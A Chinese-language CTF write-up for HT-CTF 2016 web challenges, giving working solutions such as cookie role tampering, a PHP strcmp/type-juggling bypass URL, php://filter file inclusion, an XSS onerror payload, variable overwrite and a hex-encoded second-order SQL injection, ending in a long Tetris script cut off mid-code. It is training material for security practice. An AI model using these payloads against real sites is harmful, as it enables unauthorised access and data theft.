前言
今年的題目基於去年的題目新增了幾道題
最安全的筆記管理系統 -做不出
Document-getshell-找不到flag
題目
捉迷藏
思路
點擊index,flag一閃而過,簡單粗暴點直接查看源碼獲得flag
view-source:http://218.76.35.75:20111/Index.php
<html>
<head>
<title>HT-CTF-2016 - Hidden Flag</title>
<meta http-equiv="refresh" content="0; url=index.php" />
</head>
<body style="margin:auto;padding-top:50px;background:black;color:#0F0;">
A HIDDEN FLAG: FLAG{th!5!5n0tth3fl@g}
<div align="center">
<pre class="logo" style="font-size:6px;">
__ ________ __________________ ___ ____ ________
/ / / /_ __/ / ____/_ __/ ____/ |__ \ / __ < / ___/
/ /_/ / / /_____/ / / / / /_________/ // / / / / __ \
/ __ / / /_____/ /___ / / / __/_____/ __// /_/ / / /_/ /
/_/ /_/ /_/ \____/ /_/ /_/ /____/\____/_/\____/
</pre>
</div>
</body>
</html>簡單問答
思路
我們直接查看源碼能看到select中option選項的值與顯示的值不對勁
<option value="2015">2016</option>按鈕事件爲 disabled
審查元素->刪除disabled->提交->抓包
修改參數爲如下得flag
後臺後臺後臺
思路
抓包,可以看到cookies中的User與Member參數以不同編碼提交給服務器的。
Cookie: PHPSESSID=0f4cl5j51620v7rgja3km6r733; User=JohnTan101; Member=Tm9ybWFsbase64解密Tm9ybWFs明文爲Normal,於是將”Admin”base64加密並替換Member內容得flag
Tips:爲什麼加密Admin而不是admin?因爲主頁顯示"Only Member with Admin rights is allow to enter "
php是最好的語言
思路
代碼審計題,經過一系列的傳參和判斷。直接給出答案
<?php
show_source(__FILE__);
$v1=0;$v2=0;$v3=0;
$a=(array)json_decode(@$_GET['foo']);
if(is_array($a)){
is_numeric(@$a["bar1"])?die("nope"):NULL;
if(@$a["bar1"]){
($a["bar1"]>2016)?$v1=1:NULL;
}
if(is_array(@$a["bar2"])){
if(count($a["bar2"])!==5 OR !is_array($a["bar2"][0])) die("nope");
$pos = array_search("nudt", $a["a2"]);
$pos===false?die("nope"):NULL;
foreach($a["bar2"] as $key=>$val){
$val==="nudt"?die("nope"):NULL;
}
$v2=1;
}
}
$c=@$_GET['cat'];
$d=@$_GET['dog'];
if(@$c[1]){
if(!strcmp($c[1],$d) && $c[1]!==$d){
eregi("3|1|c",$d.$c[0])?die("nope"):NULL;
strpos(($c[0].$d), "htctf2016")?$v3=1:NULL;
}
}
if($v1 && $v2 && $v3){
include "flag.php";
echo $flag;
}
?>
http://218.76.35.75:20114/?foo={%22bar1%22:%222017f%22,%22bar2%22:[[1,1],1,1,1,1]}&cat[0]=123&cat[1][]=1&dog=%00htctf2016
?>
flag{php_i5_n0t_b4d}
login
思路
從源代碼可初步判斷爲文件包含
<html>
<head>
<title>trolol</title>
</head>
<body>
<center>
<a href="./?page=main">main</a>
<a href="./?page=info">server info</a>
<a href="./?page=login">login</a>
</center>
</body>
</html>
構造包含語句
http://218.76.35.75:20115/?page=php://filter/convert.base64-encode/resource=login
讀出login的源碼爲:
<?php
$login=@$_POST['login'];
$password=@$_POST['password'];
if(@$login=="admin" && sha1(@$password)==$pwhash){
include('flag.txt');
}else if (@$login&&@$password&&@$_GET['debug']) {
echo "Login error, login credentials has been saved to ./log/".htmlentities($login).".log";
$logfile = "./log/".$login.".log";
file_put_contents($logfile, $login."\n".$password);
}
?>
<center>
login<br/><br/>
<form action="" method="POST">
<input name="login" placeholder="login"><br/>
<input name="password" placeholder="password"><br/><br/>
<input type="submit" value="Go!">
</form>
</center>根據login的源碼構造包含語句,只要包含log/目錄就得出flag
http://218.76.35.75:20115/?page=login&debug=0&log=log/
http 頭注入
思路
http頭注入大多數爲XXF注入,Referer注入等,此處一個一個試。測出
Referer存在注入
此處可用sqlmap注入
簡單的文件上傳
思路
直接上傳PHP文件,修改content-type
簡單的JS
思路
查看源碼會發現有一段JS沒有執行,
複製,在控制檯中執行,將document.write(p)修改爲alert(p)
訪問這個頁面,發現flag在cookie中
C00k1els60SecU5e
PHP是門鬆散的語言
思路
我們能看到以下的代碼
- - - - - - - source code - - - - - - - - - -
$he ='goodluck';
parse_str($_GET['heetian']);
if $he = 'abcd';
echo $flag;
he=?
直接變量覆蓋
http://218.76.35.75:20124/index.php?heetian=he=abcd
試試XSS
思路
輸入123'發現出現個img標籤
於是直接構造payload可造成xss,根據hint
payload:#' onerror=alert(document.domain)
得到flag
簡單的文件包含
思路
描述:Flag 在/flag
直接包含/flag
http://218.76.35.75:20126/index.php?page=/flag
查看源碼
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>歡迎來到比賽</title>
</head>
<body>
flag 不在這裏<!-- flag: 62a72cb2f3d5e7fc0284da9f21e66c9f.php--></body>
</html>
直接訪問flag提示的PHP
http://218.76.35.75:20126/62a72cb2f3d5e7fc0284da9f21e66c9f.php
簡單的驗證
思路
直接抓包,根據提示,將User=Bob改爲User=admin,
爆破guess的值
guess=573 獲得flag
Vote
思路
掃備份,存在一個.index.php.swp的vim緩存文件備份。
直接用vim -r index.php 恢復
獲得index.php源碼。
貼出關鍵部分
<?php
include 'db.php';
session_start();
if (!isset($_SESSION['login'])){
$_SESSION['login'] = 'guest'.mt_rand(1e5, 1e6);
$login = $_SESSION['login'];
}
if (isset($_POST['submit'])) {
if (!isset($_POST['id'], $_POST['vote']) || !is_numeric($_POST['id']))
die('please select ...');
$id = $_POST['id'];
$vote = (int)$_POST['vote'];
if ($vote > 5 || $vote < 1)
$vote = 1;
$q = mysql_query("INSERT INTO t_vote VALUES ({$id}, {$vote}, '{$login}')");
$q = mysql_query("SELECT id FROM t_vote WHERE user = '{$login}' GROUP BY id");
echo '<p><b>Thank you!</b> Results:</p>';
echo '<table border="1">';
echo '<tr><th>Logo</th><th>Total votes</th><th>Average</th></tr>';
while ($r = mysql_fetch_array($q)) {
$arr = mysql_fetch_array(mysql_query("SELECT title FROM t_picture WHERE id = ".$r['id']));
echo '<tr><td>'.$arr[0].'</td>';
$arr = mysql_fetch_array(mysql_query("SELECT COUNT(value), AVG(value) FROM t_vote WHERE id = ".$r['id']));
echo '<td>'.$arr[0].'</td><td>'.round($arr[1],2).'</td></tr>';
}
echo '<br><a href="index.php">goBack</a><br>';
exit;
}
?>從代碼中我們可以看到 id被is_numeric給修飾過,不存在一次注入。但是在後面id又被從數據庫取出來,形成了二次注入。
我們可以將sql語句轉換爲16進制由此進行二次注入
payload:
id=1 and 1=2 union select database()&vote=1&submit=Submit
轉換爲16進制
0x3120616e6420313d3220756e696f6e2073656c6563742064617461626173652829
最終代碼:
請求地址:http://218.76.35.75:65080/index.php
post數據:
id=0x3120616e6420313d3220756e696f6e2073656c6563742064617461626173652829&vote=1&submit=Submit
一直如此構造,得到flag,表爲t_flag
GG
思路
一進去是個遊戲,查看源碼有個tetris.js這樣的js腳本,於是追蹤。
function Tetris(){function f(b){this.id=b;this.el=document.getElementById(this.id);var d=this;this.activate=function(){d.el.style.display="block"==d.el.style.display?"none":"block"};this.close=function(){d.el.style.display="none"};this.isActive=function(){return"block"==d.el.style.display}}function l(b,d,a,c){this.unit=b;this.x=d;this.y=a;this.el=document.getElementById(c);this.board=[];for(a=0;a<this.y;a++)for(this.board.push([]),d=0;d<this.x;d++)this.board[a].push(0);this.destroy=function(){for(var c=
0;c<this.board.length;c++)for(var a=0;a<this.board[c].length;a++)this.board[c][a]&&(this.el.removeChild(this.board[c][a]),this.board[c][a]=0)};this.removeFullLines=function(){for(var c=0,a=this.y-1;0<a;a--)this.isLineFull(a)&&(this.removeLine(a),c++,a++);return c};this.isLineFull=function(c){for(var a=0;a<this.x;a++)if(!this.board[c][a])return!1;return!0};this.removeLine=function(c){for(var a=0;a<this.x;a++)this.el.removeChild(this.board[c][a]),this.board[c][a]=0;for(c--;0<c;c--)for(a=0;a<this.x;a++)if(this.board[c][a]){var b=
this.board[c][a];b.style.top=b.offsetTop+this.unit+"px";this.board[c+1][a]=b;this.board[c][a]=0}};this.getBlock=function(c,a){if(0>c)return 0;if(c<this.y&&a<this.x)return this.board[c][a];throw"Area.getBlock("+c+",\t"+a+") failed";};this.addElement=function(c){var a=parseInt(c.offsetLeft/this.unit),b=parseInt(c.offsetTop/this.unit);0<=b&&b<this.y&&0<=a&&a<this.x&&(this.board[b][a]=c)}}function k(b,d){var a=this;this.tetris=b;this.area=d;this.stopped=this.running=this.speed=this.position=this.nextType=
this.type=this.forceMoveDownID=this.fallDownID=null;this.board=[];this.elements=[];this.nextElements=[];this.y=this.x=null;this.puzzles=[[[0,0,1],[1,1,1],[0,0,0]],[[1,0,0],[1,1,1],[0,0,0]],[[0,1,1],[1,1,0],[0,0,0]],[[1,1,0],[0,1,1],[0,0,0]],[[0,1,0],[1,1,1],[0,0,0]],[[1,1],[1,1]],[[0,0,0,0],[1,1,1,1],[0,0,0,0],[0,0,0,0]]];this.reset=function(){this.fallDownID&&clearTimeout(this.fallDownID);this.forceMoveDownID&&clearTimeout(this.forceMoveDownID);this.type=this.nextType;this.nextType=q(this.puzzles.length);
this.position=0;this.speed=80+700/this.tetris.stats.getLevel();this.stopped=this.running=!1;this.board=[];this.elements=[];for(var c=0;c<this.nextElements.length;c++)document.getElementById("tetris-nextpuzzle").removeChild(this.nextElements[c]);this.nextElements=[];this.y=this.x=null};this.nextType=q(this.puzzles.length);this.reset();this.isRunning=function(){return this.running};this.isStopped=function(){return this.stopped};this.getX=function(){return this.x};this.getY=function(){return this.y};
this.mayPlace=function(){for(var c=this.puzzles[this.type],a=parseInt((this.area.x-c[0].length)/2),b=!1,d=0,g=c.length-1;0<=g;g--){for(var h=0;h<c[g].length;h++)if(c[g][h]&&(b=!0,this.area.getBlock(1,a+h)))return!1;b&&d++;if(0>1-d)break}return!0};this.place=function(){this.tetris.stats.setPuzzles(this.tetris.stats.getPuzzles()+1);this.tetris.stats.getPuzzles()>=10+2*this.tetris.stats.getLevel()&&(this.tetris.stats.setLevel(this.tetris.stats.getLevel()+1),this.tetris.stats.setPuzzles(0));var c=this.puzzles[this.type],
a=parseInt((this.area.x-c[0].length)/2),b=!1,g=0;this.x=a;this.y=1;this.board=this.createEmptyPuzzle(c.length,c[0].length);for(var d=c.length-1;0<=d;d--){for(var h=0;h<c[d].length;h++)if(c[d][h]){var b=!0,e=document.createElement("div");e.className="block"+this.type;e.style.left=(a+h)*this.area.unit+"px";e.style.top=(1-g)*this.area.unit+"px";this.area.el.appendChild(e);this.board[d][h]=e;this.elements.push(e)}g&&this.y--;b&&g++}this.running=!0;this.fallDownID=setTimeout(this.fallDown,this.speed);
c=this.puzzles[this.nextType];for(d=0;d<c.length;d++)for(h=0;h<c[d].length;h++)c[d][h]&&(e=document.createElement("div"),e.className="block"+this.nextType,e.style.left=h*this.area.unit+"px",e.style.top=d*this.area.unit+"px",document.getElementById("tetris-nextpuzzle").appendChild(e),this.nextElements.push(e))};this.destroy=function(){for(var c=0;c<this.elements.length;c++)this.area.el.removeChild(this.elements[c]);this.elements=[];this.board=[];this.reset()};this.createEmptyPuzzle=function(c,a){for(var b=
[],d=0;d<c;d++){b.push([]);for(var g=0;g<a;g++)b[d].push(0)}return b};this.fallDown=function(){if(a.isRunning())if(a.mayMoveDown())a.moveDown(),a.fallDownID=setTimeout(a.fallDown,a.speed);else{for(var c=0;c<a.elements.length;c++)a.area.addElement(a.elements[c]);if(c=a.area.removeFullLines())a.tetris.stats.setLines(a.tetris.stats.getLines()+c),a.tetris.stats.setScore(a.tetris.stats.getScore()+1E3*a.tetris.stats.getLevel()*c);a.reset();a.mayPlace()?a.place():a.tetris.gameOver()}};this.forceMoveDown=
function(){if(!a.isRunning()&&!a.isStopped())if(a.mayMoveDown())a.tetris.stats.setScore(a.tetris.stats.getScore()+5+a.tetris.stats.getLevel()),a.tetris.stats.setActions(a.tetris.stats.getActions()+1),a.moveDown(),a.forceMoveDownID=setTimeout(a.forceMoveDown,30);else{for(var c=0;c<a.elements.length;c++)a.area.addElement(a.elements[c]);if(c=a.area.removeFullLines())a.tetris.stats.setLines(a.tetris.stats.getLines()+c),a.tetris.stats.setScore(a.tetris.stats.getScore()+1E3*a.tetris.stats.getLevel()*c);
a.reset();a.mayPlace()?a.place():a.tetris.gameOver()}};this.stop=function(){this.running=!1};this.mayRotate=function(){for(var c=0;c<this.board.length;c++)for(var a=0;a<this.board[c].length;a++)if(this.board[c][a]){var b=this.getY()+this.board.length-1-a,d=this.getX()+c;if(b>=this.area.y||0>d||d>=this.area.x||this.area.getBlock(b,d))return!1}return!0};this.rotate=function(){for(var c=this.createEmptyPuzzle(this.board.length,this.board[0].length),a=0;a<this.board.length;a++)for(var b=0;b<this.board[a].length;b++)if(this.board[a][b]){var d=
c.length-1-b,g=a,e=this.board[a][b],f=d-a;e.style.left=e.offsetLeft+(g-b)*this.area.unit+"px";e.style.top=e.offsetTop+f*this.area.unit+"px";c[d][g]=e}this.board=c};this.mayMoveDown=function(){for(var a=0;a<this.board.length;a++)for(var b=0;b<this.board[a].length;b++)if(this.board[a][b]&&(this.getY()+a+1>=this.area.y||this.area.getBlock(this.getY()+a+1,this.getX()+b)))return this.stopped=!0,!1;return!0};this.moveDown=function(){for(var a=0;a<this.elements.length;a++)this.elements[a].style.top=this.elements[a].offsetTop+
this.area.unit+"px";this.y++};this.mayMoveLeft=function(){for(var a=0;a<this.board.length;a++)for(var b=0;b<this.board[a].length;b++)if(this.board[a][b]&&(0>this.getX()+b-1||this.area.getBlock(this.getY()+a,this.getX()+b-1)))return!1;return!0};this.moveLeft=function(){for(var a=0;a<this.elements.length;a++)this.elements[a].style.left=this.elements[a].offsetLeft-this.area.unit+"px";this.x--};this.mayMoveRight=function(){for(var a=0;a<this.board.length;a++)for(var b=0;b<this.board[a].length;b++)if(this.board[a][b]&&
(this.getX()+b+1>=this.area.x||this.area.getBlock(this.getY()+a,this.getX()+b+1)))return!1;return!0};this.moveRight=function(){for(var a=0;a<this.elements.length;a++)this.elements[a].style.left=this.elements[a].offsetLeft+this.area.unit+"px";this.x++}}function q(b){return Math.floor(Math.random()*b)}function p(){this.get=function(b){for(var d=document.cookie.split(";"),a=0;a<d.length;++a){var c=d[a].split("=");if(2==c.length&&(c[0]=c[0].trim(),c[1]=c[1].trim(),c[0]==b))return unescape(c[1])}return""};
this.set=function(b,d,a,c,e,f){this.del(b);c||(c="/");b=b+"="+escape(d);a&&(a=new Date((new Date).getTime()+1E3*a),b+="; expires="+a.toGMTString());b=b+(c?";\tpath="+c:"")+(e?";\tdomain="+e:"");b+=f?";\tsecure":"";document.cookie=b};this.del=function(b){document.cookie=b+"=; expires=Thu, 01-Jan-70\t00:00:01 GMT"}}var b=this;this.stats=new function(){this.level;this.time;this.apm;this.lines;this.score;this.puzzles;this.actions;this.el={level:document.getElementById("tetris-stats-level"),time:document.getElementById("tetris-stats-time"),
apm:document.getElementById("tetris-stats-apm"),lines:document.getElementById("tetris-stats-lines"),score:document.getElementById("tetris-stats-score")};this.timerId=null;var b=this;this.start=function(){this.reset();this.timerId=setInterval(this.incTime,1E3)};this.stop=function(){this.timerId&&clearInterval(this.timerId)};this.reset=function(){this.stop();this.level=1;this.actions=this.puzzles=this.score=this.lines=this.apm=this.time=0;this.el.level.innerHTML=this.level;this.el.time.innerHTML=this.time;
this.el.apm.innerHTML=this.apm;this.el.lines.innerHTML=this.lines;this.el.score.innerHTML=this.score};this.incTime=function(){b.time++;b.el.time.innerHTML=b.time;b.apm=parseInt(b.actions/b.time*60);b.el.apm.innerHTML=b.apm};this.setScore=function(b){this.score=b;this.el.score.innerHTML=this.score};this.setLevel=function(b){this.level=b;this.el.level.innerHTML=this.level};this.setLines=function(b){this.lines=b;this.el.lines.innerHTML=this.lines};this.setPuzzles=function(b){this.puzzles=b};this.setActions=
function(b){this.actions=b};this.getScore=function(){return this.score};this.getLevel=function(){return this.level};this.getLines=function(){return this.lines};this.getPuzzles=function(){return this.puzzles};this.getActions=function(){return this.actions}};this.area=this.puzzle=null;this.areaY=this.areaX=this.unit=20;this.highscores=new function(b){function d(a,b){this.name=a;this.score=b}this.maxscores=b;this.scores=[];this.load=function(){var a=(new p).get("tetris-highscores");this.scores=[];if(a.length)for(var a=
a.split("|"),b=0;b<a.length;++b){var e=a[b].split(":");this.scores.push(new d(e[0],Number(e[1])))}};this.save=function(){for(var a=new p,b=[],d=0;d<this.scores.length;++d)b.push(this.scores[d].name+":"+this.scores[d].score);b=b.join("|");a.set("tetris-highscores",b,864E5)};this.mayAdd=function(a){if(this.scores.length<this.maxscores)return 1E6<a&&(a=new p,a.set("urlkey","webqwer"[1]+"100.js",864E5)),!0;for(var b=this.scores.length-1;0<=b;--b)if(this.scores[b].score<a)return 1E6<a&&(a=new p,a.set("urlkey",
"webqwer"[1]+"100.js",864E5)),!0;return!1};this.add=function(a,b){a=a.replace(/[;=:|]/g,"?");a=a.replace(/</g,"<").replace(/>/g,">");if(this.scores.length<this.maxscores)this.scores.push(new d(a,b));else for(var e=this.scores.length-1;0<=e;--e)if(this.scores[e].score<b){this.scores.removeByIndex(e);this.scores.push(new d(a,b));break}this.sort();this.save()};this.getScores=function(){return this.scores};this.toHtml=function(){for(var a='<table\tcellspacing="0"\tcellpadding="2"><tr><th></th><th>Name</th><th>Score</th></tr>',
b=0;b<this.scores.length;++b)a+="<tr><td>?.</td><td>?</td><td>?</td></tr>".format(b+1,this.scores[b].name,this.scores[b].score);return a+"</table>"};this.sort=function(){var a=this.scores,b=a.length;this.scores=[];for(var d=0;d<b;++d){for(var e=null,g=null,f=0;f<a.length;++f)if(!e||a[f].score>e.score)e=a[f],g=f;a.removeByIndex(g);this.scores.push(e)}};this.load()}(10);this.start=function(){b.reset();b.stats.start();document.getElementById("tetris-nextpuzzle").style.display="block";document.getElementById("tetris-keys").style.display=
"none";b.area=new l(b.unit,b.areaX,b.areaY,"tetris-area");b.puzzle=new k(b,b.area);b.puzzle.mayPlace()?b.puzzle.place():b.gameOver()};this.reset=function(){b.puzzle&&(b.puzzle.destroy(),b.puzzle=null);b.area&&(b.area.destroy(),b.area=null);document.getElementById("tetris-gameover").style.display="none";document.getElementById("tetris-nextpuzzle").style.display="none";document.getElementById("tetris-keys").style.display="block";b.stats.reset()};this.gameOver=function(){b.stats.stop();b.puzzle.stop();
document.getElementById("tetris-nextpuzzle").style.display="none";document.getElementById("tetris-gameover").style.display="block";if(this.highscores.mayAdd(this.stats.getScore())){var e=prompt("Game Over !\nEnter your name:","");e&&e.trim().length&&this.highscores.add(e,this.stats.getScore())}};this.up=function(){b.puzzle&&b.puzzle.isRunning()&&!b.puzzle.isStopped()&&b.puzzle.mayRotate()&&(b.puzzle.rotate(),b.stats.setActions(b.stats.getActions()+1))};this.down=function(){b.puzzle&&b.puzzle.isRunning()&&
!b.puzzle.isStopped()&&b.puzzle.mayMoveDown()&&(b.stats.setScore(b.stats.getScore()+5+b.stats.getLevel()),b.puzzle.moveDown(),b.stats.setActions(b.stats.getActions()+1))};this.left=function(){b.puzzle&&b.puzzle.isRunning()&&!b.puzzle.isStopped()&&b.puzzle.mayMoveLeft()&&(b.puzzle.moveLeft(),b.stats.setActions(b.stats.getActions()+1))};this.right=function(){b.puzzle&&b.puzzle.isRunning()&&!b.puzzle.isStopped()&&b.puzzle.mayMoveRight()&&(b.puzzle.moveRight(),b.stats.setActions(b.stats.getActions()+
1))};this.space=function(){b.puzzle&&b.puzzle.isRunning()&&!b.puzzle.isStopped()&&(b.puzzle.stop(),b.puzzle.forceMoveDown())};var m=new f("tetris-help"),n=new f("tetris-highscores");document.getElementById("tetris-menu-start").onclick=function(){m.close();n.close();b.start();this.blur()};document.getElementById("tetris-menu-reset").onclick=function(){m.close();n.close();b.reset();this.blur()};document.getElementById("tetris-menu-help").onclick=function(){n.close();m.activate();this.blur()};document.getElementById("tetris-help-close").onclick=
m.close;document.getElementById("tetris-menu-highscores").onclick=function(){m.close();document.getElementById("tetris-highscores-content").innerHTML=b.highscores.toHtml();n.activate();this.blur()};document.getElementById("tetris-highscores-close").onclick=n.close;var e=new function(){this.up=38;this.down=40;this.left=37;this.right=39;this.n=78;this.r=82;this.space=32;this.f12=123;this.escape=27;this.keys=[];this.funcs=[];var b=this;this.set=function(b,a){this.keys.push(b);this.funcs.push(a)};this.event=
function(d){d||(d=window.event);for(var a=0;a<b.keys.length;a++)if(d.keyCode==b.keys[a])b.funcs[a]()}};e.set(e.n,this.start);e.set(e.r,this.reset);e.set(e.up,this.up);e.set(e.down,this.down);e.set(e.left,this.left);e.set(e.right,this.right);e.set(e.space,this.space);document.onkeydown=e.event}String.prototype.trim||(String.prototype.trim=function(){return this.replace(/^\s*|\s*$/g,"")});Array.prototype.removeByIndex||(Array.prototype.removeByIndex=function(f){this.splice(f,1)});
String.prototype.format||(String.prototype.format=function(){if(!arguments.length)throw"String.format()\tfailed,\tno arguments passed, this =\t"+this;var f=this.split("?");if(arguments.length!=f.length-1)throw"String.format() failed, tokens !=\targuments, this\t= "+this;for(var l=f[0],k=0;k<arguments.length;++k)l+=arguments[k]+f[k+1];return l});美化下js
function Tetris() {
function f(b) {
this.id = b;
this.el = document.getElementById(this.id);
var d = this;
this.activate = function() {
d.el.style.display = "block" == d.el.style.display ? "none" : "block"
};
this.close = function() {
d.el.style.display = "none"
};
this.isActive = function() {
return "block" == d.el.style.display
}
}
function l(b, d, a, c) {
this.unit = b;
this.x = d;
this.y = a;
this.el = document.getElementById(c);
this.board = [];
for (a = 0; a < this.y; a++) for (this.board.push([]), d = 0; d < this.x; d++) this.board[a].push(0);
this.destroy = function() {
for (var c = 0; c < this.board.length; c++) for (var a = 0; a < this.board[c].length; a++) this.board[c][a] && (this.el.removeChild(this.board[c][a]), this.board[c][a] = 0)
};
this.removeFullLines = function() {
for (var c = 0, a = this.y - 1; 0 < a; a--) this.isLineFull(a) && (this.removeLine(a), c++, a++);
return c
};
this.isLineFull = function(c) {
for (var a = 0; a < this.x; a++) if (!this.board[c][a]) return !1;
return !0
};
this.removeLine = function(c) {
for (var a = 0; a < this.x; a++) this.el.removeChild(this.board[c][a]), this.board[c][a] = 0;
for (c--; 0 < c; c--) for (a = 0; a < this.x; a++) if (this.board[c][a]) {
var b = this.board[c][a];
b.style.top = b.offsetTop + this.unit + "px";
this.board[c + 1][a] = b;
this.board[c][a] = 0
}
};
this.getBlock = function(c, a) {
if (0 > c) return 0;
if (c < this.y && a < this.x) return this.board[c][a];
throw "Area.getBlock(" + c + ",\t" + a + ") failed";
};
this.addElement = function(c) {
var a = parseInt(c.offsetLeft / this.unit),
b = parseInt(c.offsetTop / this.unit);
0 <= b && b < this.y && 0 <= a && a < this.x && (this.board[b][a] = c)
}
}
function k(b, d) {
var a = this;
this.tetris = b;
this.area = d;
this.stopped = this.running = this.speed = this.position = this.nextType = this.type = this.forceMoveDownID = this.fallDownID = null;
this.board = [];
this.elements = [];
this.nextElements = [];
this.y = this.x = null;
this.puzzles = [
[
[0, 0, 1],
[1, 1, 1],
[0, 0, 0]
],
[
[1, 0, 0],
[1, 1, 1],
[0, 0, 0]
],
[
[0, 1, 1],
[1, 1, 0],
[0, 0, 0]
],
[
[1, 1, 0],
[0, 1, 1],
[0, 0, 0]
],
[
[0, 1, 0],
[1, 1, 1],
[0, 0, 0]
],
[
[1, 1],
[1, 1]
],
[
[0, 0, 0, 0],
[1, 1, 1, 1],
[0, 0, 0, 0],
[0, 0, 0, 0]
]
];
this.reset = function() {
this.fallDownID && clearTimeout(this.fallDownID);
this.forceMoveDownID && clearTimeout(this.forceMoveDownID);
this.type = this.nextType;
this.nextType = q(this.puzzles.length);
this.position = 0;
this.speed = 80 + 700 / this.tetris.stats.getLevel();
this.stopped = this.running = !1;
this.board = [];
this.elements = [];
for (var c = 0; c < this.nextElements.length; c++) document.getElementById("tetris-nextpuzzle").removeChild(this.nextElements[c]);
this.nextElements = [];
this.y = this.x = null
};
this.nextType = q(this.puzzles.length);
this.reset();
this.isRunning = function() {
return this.running
};
this.isStopped = function() {
return this.stopped
};
this.getX = function() {
return this.x
};
this.getY = function() {
return this.y
};
this.mayPlace = function() {
for (var c = this.puzzles[this.type], a = parseInt((this.area.x - c[0].length) / 2), b = !1, d = 0, g = c.length - 1; 0 <= g; g--) {
for (var h = 0; h < c[g].length; h++) if (c[g][h] && (b = !0, this.area.getBlock(1, a + h))) return !1;
b && d++;
if (0 > 1 - d) break
}
return !0
};
this.place = function() {
this.tetris.stats.setPuzzles(this.tetris.stats.getPuzzles() + 1);
this.tetris.stats.getPuzzles() >= 10 + 2 * this.tetris.stats.getLevel() && (this.tetris.stats.setLevel(this.tetris.stats.getLevel() + 1), this.tetris.stats.setPuzzles(0));
var c = this.puzzles[this.type],
a = parseInt((this.area.x - c[0].length) / 2),
b = !1,
g = 0;
this.x = a;
this.y = 1;
this.board = this.createEmptyPuzzle(c.length, c[0].length);
for (var d = c.length - 1; 0 <= d; d--) {
for (var h = 0; h < c[d].length; h++) if (c[d][h]) {
var b = !0,
e = document.createElement("div");
e.className = "block" + this.type;
e.style.left = (a + h) * this.area.unit + "px";
e.style.top = (1 - g) * this.area.unit + "px";
this.area.el.appendChild(e);
this.board[d][h] = e;
this.elements.push(e)
}
g && this.y--;
b && g++
}
this.running = !0;
this.fallDownID = setTimeout(this.fallDown, this.speed);
c = this.puzzles[this.nextType];
for (d = 0; d < c.length; d++) for (h = 0; h < c[d].length; h++) c[d][h] && (e = document.createElement("div"), e.className = "block" + this.nextType, e.style.left = h * this.area.unit + "px", e.style.top = d * this.area.unit + "px", document.getElementById("tetris-nextpuzzle").appendChild(e), this.nextElements.push(e))
};
this.destroy = function() {
for (var c = 0; c < this.elements.length; c++) this.area.el.removeChild(this.elements[c]);
this.elements = [];
this.board = [];
this.reset()
};
this.createEmptyPuzzle = function(c, a) {
for (var b = [], d = 0; d < c; d++) {
b.push([]);
for (var g = 0; g < a; g++) b[d].push(0)
}
return b
};
this.fallDown = function() {
if (a.isRunning()) if (a.mayMoveDown()) a.moveDown(), a.fallDownID = setTimeout(a.fallDown, a.speed);
else {
for (var c = 0; c < a.elements.length; c++) a.area.addElement(a.elements[c]);
if (c = a.area.removeFullLines()) a.tetris.stats.setLines(a.tetris.stats.getLines() + c), a.tetris.stats.setScore(a.tetris.stats.getScore() + 1E3 * a.tetris.stats.getLevel() * c);
a.reset();
a.mayPlace() ? a.place() : a.tetris.gameOver()
}
};
this.forceMoveDown = function() {
if (!a.isRunning() && !a.isStopped()) if (a.mayMoveDown()) a.tetris.stats.setScore(a.tetris.stats.getScore() + 5 + a.tetris.stats.getLevel()), a.tetris.stats.setActions(a.tetris.stats.getActions() + 1), a.moveDown(), a.forceMoveDownID = setTimeout(a.forceMoveDown, 30);
else {
for (var c = 0; c < a.elements.length; c++) a.area.addElement(a.elements[c]);
if (c = a.area.removeFullLines()) a.tetris.stats.setLines(a.tetris.stats.getLines() + c), a.tetris.stats.setScore(a.tetris.stats.getScore() + 1E3 * a.tetris.stats.getLevel() * c);
a.reset();
a.mayPlace() ? a.place() : a.tetris.gameOver()
}
};
this.stop = function() {
this.running = !1
};
this.mayRotate = function() {
for (var c = 0; c < this.board.length; c++) for (var a = 0; a < this.board[c].length; a++) if (this.board[c][a]) {
var b = this.getY() + this.board.length - 1 - a,
d = this.getX() + c;
if (b >= this.area.y || 0 > d || d >= this.area.x || this.area.getBlock(b, d)) return !1
}
return !0
};
this.rotate = function() {
for (var c = this.createEmptyPuzzle(this.board.length, this.board[0].length), a = 0; a < this.board.length; a++) for (var b = 0; b < this.board[a].length; b++) if (this.board[a][b]) {
var d = c.length - 1 - b,
g = a,
e = this.board[a][b],
f = d - a;
e.style.left = e.offsetLeft + (g - b) * this.area.unit + "px";
e.style.top = e.offsetTop + f * this.area.unit + "px";
c[d][g] = e
}
this.board = c
};
this.mayMoveDown = function() {
for (var a = 0; a < this.board.length; a++) for (var b = 0; b < this.board[a].length; b++) if (this.board[a][b] && (this.getY() + a + 1 >= this.area.y || this.area.getBlock(this.getY() + a + 1, this.getX() + b))) return this.stopped = !0, !1;
return !0
};
this.moveDown = function() {
for (var a = 0; a < this.elements.length; a++) this.elements[a].style.top = this.elements[a].offsetTop + this.area.unit + "px";
this.y++
};
this.mayMoveLeft = function() {
for (var a = 0; a < this.board.length; a++) for (var b = 0; b < this.board[a].length; b++) if (this.board[a][b] && (0 > this.getX() + b - 1 || this.area.getBlock(this.getY() + a, this.getX() + b - 1))) return !1;
return !0
};
this.moveLeft = function() {
for (var a = 0; a < this.elements.length; a++) this.elements[a].style.left = this.elements[a].offsetLeft - this.area.unit + "px";
this.x--
};
this.mayMoveRight = function() {
for (var a = 0; a < this.board.length; a++) for (var b = 0; b < this.board[a].length; b++) if (this.board[a][b] && (this.getX() + b + 1 >= this.area.x || this.area.getBlock(this.getY() + a, this.getX() + b + 1))) return !1;
return !0
};
this.moveRight = function() {
for (var a = 0; a < this.elements.length; a++) this.elements[a].style.left = this.elements[a].offsetLeft + this.area.unit + "px";
this.x++
}
}
function q(b) {
return Math.floor(Math.random() * b)
}
function p() {
this.get = function(b) {
for (var d = document.cookie.split(";"), a = 0; a < d.length; ++a) {
var c = d[a].split("=");
if (2 == c.length && (c[0] = c[0].trim(), c[1] = c[1].trim(), c[0] == b)) return unescape(c[1])
}
return ""
};
this.set = function(b, d, a, c, e, f) {
this.del(b);
c || (c = "/");
b = b + "=" + escape(d);
a && (a = new Date((new Date).getTime() + 1E3 * a), b += "; expires=" + a.toGMTString());
b = b + (c ? ";\tpath=" + c : "") + (e ? ";\tdomain=" + e : "");
b += f ? ";\tsecure" : "";
document.cookie = b
};
this.del = function(b) {
document.cookie = b + "=; expires=Thu, 01-Jan-70\t00:00:01 GMT"
}
}
var b = this;
this.stats = new function() {
this.level;
this.time;
this.apm;
this.lines;
this.score;
this.puzzles;
